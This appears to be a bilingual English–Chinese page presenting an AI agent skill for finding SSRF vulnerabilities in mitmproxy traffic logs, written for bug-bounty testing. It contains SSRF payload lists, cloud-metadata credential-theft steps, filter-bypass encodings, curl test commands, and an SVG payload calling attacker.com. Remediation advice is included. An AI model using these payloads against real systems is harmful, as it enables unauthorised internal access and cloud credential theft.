Back to Details

mitm-find-ssrf

Compare original and translation side by side

🇺🇸

Original

English
🇨🇳

Translation

Chinese

Find SSRF Vulnerabilities

查找SSRF漏洞

Analyze the mitmproxy dump (log.txt) for SSRF vulnerabilities for: $ARGUMENTS
Requires: 
log.txt
in the current directory. If it's missing, capture traffic first:
bash
mitmdump --set flow_detail=3 2>&1 | tee log.txt
分析mitmproxy转储文件(log.txt)中的SSRF漏洞,分析对象为:$ARGUMENTS
要求:当前目录下存在
log.txt
。如果文件缺失,请先捕获流量:
bash
mitmdump --set flow_detail=3 2>&1 | tee log.txt

High-Value SSRF Patterns (from 113 real HackerOne bounty reports)

高价值SSRF特征(来自113份真实的HackerOne赏金报告)

1. URL Parameters in Requests

1. 请求中的URL参数

Common vulnerable parameters:
url, uri, path, dest, redirect, link, href
src, source, file, document, page, load
target, proxy, fetch, request, callback
webhook, hook, endpoint, api_url, base_url
image_url, avatar_url, icon_url, logo_url
pdf_url, export_url, import_url, feed_url
Search patterns:
bash
grep -iE '(url|uri|path|src|href|link|dest|redirect|webhook|callback|fetch|proxy|target)[=:]["'\''"]?https?://' log.txt
常见的易受攻击参数:
url, uri, path, dest, redirect, link, href
src, source, file, document, page, load
target, proxy, fetch, request, callback
webhook, hook, endpoint, api_url, base_url
image_url, avatar_url, icon_url, logo_url
pdf_url, export_url, import_url, feed_url
搜索指令:
bash
grep -iE '(url|uri|path|src|href|link|dest|redirect|webhook|callback|fetch|proxy|target)[=:]["'\''"]?https?://' log.txt

2. File/Image Processing Endpoints

2. 文件/图片处理端点

Real examples from bounties:
  • SVG upload triggers SSRF (Shopify)
  • Image URL in product creation
  • PDF generation with external resources
  • Avatar/profile picture from URL
Search patterns:
bash
grep -iE '\.(svg|pdf|xml|html)' log.txt
grep -iE '(upload|import|fetch|process).*url' log.txt
赏金报告中的真实案例:
  • SVG上传触发SSRF(Shopify)
  • 商品创建环节的图片URL参数
  • 引入外部资源的PDF生成功能
  • 从URL拉取的头像/个人资料图片
搜索指令:
bash
grep -iE '\.(svg|pdf|xml|html)' log.txt
grep -iE '(upload|import|fetch|process).*url' log.txt

3. Integration/Webhook Endpoints

3. 集成/Webhook端点

Real examples:
  • Sentry source code scraping
  • Git clone with credentials
  • OAuth callback manipulation
  • Webhook URL specification
Search patterns:
bash
grep -iE '(webhook|callback|hook|notify|integration)' log.txt
grep -iE 'git.*clone|git.*url' log.txt
真实案例:
  • Sentry源代码爬取
  • 携带凭证的Git克隆操作
  • OAuth回调篡改
  • 可自定义的Webhook URL设置
搜索指令:
bash
grep -iE '(webhook|callback|hook|notify|integration)' log.txt
grep -iE 'git.*clone|git.*url' log.txt

4. Host Header Injection

4. Host头注入

Real example: Host header bypass accessing internal subdomains
Host: internal.target.com
X-Forwarded-Host: internal.target.com
X-Original-URL: /internal/admin
Search patterns:
bash
grep -iE '^Host:' log.txt
grep -iE 'X-Forwarded|X-Original' log.txt
真实案例: 通过Host头绕过限制访问内部子域名
Host: internal.target.com
X-Forwarded-Host: internal.target.com
X-Original-URL: /internal/admin
搜索指令:
bash
grep -iE '^Host:' log.txt
grep -iE 'X-Forwarded|X-Original' log.txt

SSRF Target Payloads

SSRF测试Payload

Internal Network Probing

内部网络探测

http://127.0.0.1
http://localhost
http://[::1]
http://0.0.0.0
http://169.254.169.254  # AWS metadata
http://metadata.google.internal  # GCP metadata
http://100.100.100.200  # Alibaba metadata
http://127.0.0.1
http://localhost
http://[::1]
http://0.0.0.0
http://169.254.169.254  # AWS元数据
http://metadata.google.internal  # GCP元数据
http://100.100.100.200  # 阿里云元数据

Cloud Metadata Endpoints (Critical)

云厂商元数据端点(高危)

undefined
undefined

AWS

AWS

http://169.254.169.254/latest/meta-data/ http://169.254.169.254/latest/user-data/ http://169.254.169.254/latest/meta-data/iam/security-credentials/
http://169.254.169.254/latest/meta-data/ http://169.254.169.254/latest/user-data/ http://169.254.169.254/latest/meta-data/iam/security-credentials/

GCP

GCP

http://metadata.google.internal/computeMetadata/v1/ http://169.254.169.254/computeMetadata/v1/
http://metadata.google.internal/computeMetadata/v1/ http://169.254.169.254/computeMetadata/v1/

Azure

Azure

http://169.254.169.254/metadata/instance?api-version=2021-02-01
http://169.254.169.254/metadata/instance?api-version=2021-02-01

DigitalOcean

DigitalOcean

http://169.254.169.254/metadata/v1/
undefined
http://169.254.169.254/metadata/v1/
undefined

Protocol Smuggling

协议走私

file:///etc/passwd
dict://localhost:11211/
gopher://localhost:6379/_*1%0d%0a$4%0d%0aINFO%0d%0a
ldap://localhost/
file:///etc/passwd
dict://localhost:11211/
gopher://localhost:6379/_*1%0d%0a$4%0d%0aINFO%0d%0a
ldap://localhost/

Vulnerability Categories & Severity

漏洞分类与严重程度

TypeSeverityImpact
Cloud metadata accessCRITICALAWS keys, service credentials
Internal service accessHIGHDatabase, cache, admin panels
Blind SSRF (OOB)MEDIUMPort scanning, internal recon
Limited SSRF (no response)LOWDenial of service, limited recon
类型严重程度影响
云元数据访问严重泄露AWS密钥、服务凭证
内部服务访问高危可访问数据库、缓存、后台管理面板
盲SSRF(带外)中危可进行端口扫描、内部网络侦察
受限SSRF(无返回)低危可导致拒绝服务、有限范围的侦察

Testing Methodology

测试方法

Step 1: Identify URL Input Points

步骤1:识别URL输入点

bash
undefined
bash
undefined

Find URL-like parameters

查找类URL参数

grep -iE 'https?://[^\s"'''<>]+' log.txt | grep -iE '(url|uri|src|href|link|path)='
grep -iE 'https?://[^\s"'''<>]+' log.txt | grep -iE '(url|uri|src|href|link|path)='

Find base64 encoded URLs

查找Base64编码的URL

grep -oE '[A-Za-z0-9+/]{20,}={0,2}' log.txt | while read b; do echo "$b" | base64 -d 2>/dev/null | grep -q 'http' && echo "Base64 URL: $b"; done
undefined
grep -oE '[A-Za-z0-9+/]{20,}={0,2}' log.txt | while read b; do echo "$b" | base64 -d 2>/dev/null | grep -q 'http' && echo "Base64 URL: $b"; done
undefined

Step 2: Test with Internal Targets

步骤2:使用内部目标测试

bash
undefined
bash
undefined

Test localhost

测试本地回环地址

curl 'https://target.com/api/fetch?url=http://127.0.0.1:80'
curl 'https://target.com/api/fetch?url=http://127.0.0.1:80'

Test metadata (AWS)

测试AWS元数据

curl 'https://target.com/api/fetch?url=http://169.254.169.254/latest/meta-data/'
curl 'https://target.com/api/fetch?url=http://169.254.169.254/latest/meta-data/'

Test with DNS rebinding

测试DNS重绑定

curl 'https://target.com/api/fetch?url=http://your-rebind-domain.com'
undefined
curl 'https://target.com/api/fetch?url=http://your-rebind-domain.com'
undefined

Step 3: Bypass Common Filters

步骤3:绕过常见过滤规则

bash
undefined
bash
undefined

IP variations

IP格式变形

http://127.0.0.1http://2130706433 (decimal) http://127.0.0.1http://0x7f000001 (hex) http://127.0.0.1http://0177.0.0.1 (octal) http://127.0.0.1http://127.1
http://127.0.0.1http://2130706433 (十进制) http://127.0.0.1http://0x7f000001 (十六进制) http://127.0.0.1http://0177.0.0.1 (八进制) http://127.0.0.1http://127.1

DNS bypass

DNS绕过

http://localhosthttp://localtest.me http://169.254.169.254 → http://[0:0:0:0:0:ffff:169.254.169.254]
http://localhosthttp://localtest.me http://169.254.169.254 → http://[0:0:0:0:0:ffff:169.254.169.254]

URL encoding

URL编码

http://127.0.0.1 → http://%31%32%37%2e%30%2e%30%2e%31
undefined
http://127.0.0.1 → http://%31%32%37%2e%30%2e%30%2e%31
undefined

Step 4: Confirm with Out-of-Band

步骤4:通过带外方式确认漏洞

bash
undefined
bash
undefined

Use Burp Collaborator, webhook.site, or interactsh

使用Burp Collaborator、webhook.site或interactsh

curl 'https://target.com/api/fetch?url=http://YOUR-BURP-COLLABORATOR-ID.burpcollaborator.net'
undefined
curl 'https://target.com/api/fetch?url=http://YOUR-BURP-COLLABORATOR-ID.burpcollaborator.net'
undefined

Real Attack Scenarios

真实攻击场景

Scenario 1: AWS Credential Theft via SSRF

场景1:通过SSRF窃取AWS凭证

1. Find image import feature: POST /api/import?image_url=XXX
2. Set URL to: http://169.254.169.254/latest/meta-data/iam/security-credentials/
3. Response contains IAM role name
4. Fetch: http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLE_NAME
5. Get temporary AWS credentials
1. 找到图片导入功能:POST /api/import?image_url=XXX
2. 将URL设置为:http://169.254.169.254/latest/meta-data/iam/security-credentials/
3. 响应中包含IAM角色名称
4. 请求:http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLE_NAME
5. 获取临时AWS凭证

Scenario 2: Internal Service Access

场景2:访问内部服务

1. Find webhook configuration
2. Set webhook URL to internal service: http://internal-admin.local/
3. Trigger webhook
4. Access internal admin panel functionality
1. 找到Webhook配置功能
2. 将Webhook URL设置为内部服务地址:http://internal-admin.local/
3. 触发Webhook
4. 访问内部管理面板功能

Scenario 3: Blind SSRF via SVG

场景3:通过SVG实现盲SSRF

1. Upload SVG file with external reference:
   <svg><image href="http://attacker.com/callback"/></svg>
2. Server processes SVG, fetches external URL
3. Attacker receives connection from internal IP
1. 上传携带外部引用的SVG文件:
   <svg><image href="http://attacker.com/callback"/></svg>
2. 服务端处理SVG,请求外部URL
3. 攻击者收到来自内部IP的访问请求

Output Format

输出格式

undefined
undefined

SSRF Finding: [Brief Description]

SSRF漏洞发现:[简要描述]

Endpoint: 
METHOD https://target.com/path
Parameter: 
param_name
Type: [Full|Blind|Partial] Severity: [CRITICAL|HIGH|MEDIUM|LOW]
Evidence: [Request showing URL parameter]
Tested Payloads:
Impact:
  • Cloud credential theft
  • Internal network access
  • Service enumeration
Test Command: curl -X METHOD 'https://target.com/...' -d 'url=http://169.254.169.254/'
Remediation:
  • Whitelist allowed domains
  • Block private IP ranges
  • Use allowlist for protocols (http/https only)
  • Disable redirects or validate redirect targets
undefined
端点
METHOD https://target.com/path
参数
param_name
类型:[全回显/盲/部分回显] 严重程度:[严重/高危/中危/低危]
证据: [展示URL参数的请求内容]
测试Payload:
影响:
  • 云凭证窃取
  • 内部网络访问
  • 服务枚举
测试命令: curl -X METHOD 'https://target.com/...' -d 'url=http://169.254.169.254/'
修复建议:
  • 白名单允许访问的域名
  • 拦截私有IP段请求
  • 协议白名单(仅允许http/https)
  • 禁用重定向或校验重定向目标
undefined

False Positives to Ignore

可忽略的误报

  • Static CDN URLs that are hardcoded
  • OAuth redirect_uri that's validated against whitelist
  • Webhook URLs that only accept HTTPS and validated domains
  • URL parameters that are client-side only (JS fetch)
  • 硬编码的静态CDN URL
  • 已校验白名单的OAuth redirect_uri
  • 仅接受HTTPS且已校验域名的Webhook URL
  • 仅在客户端生效的URL参数(JS fetch)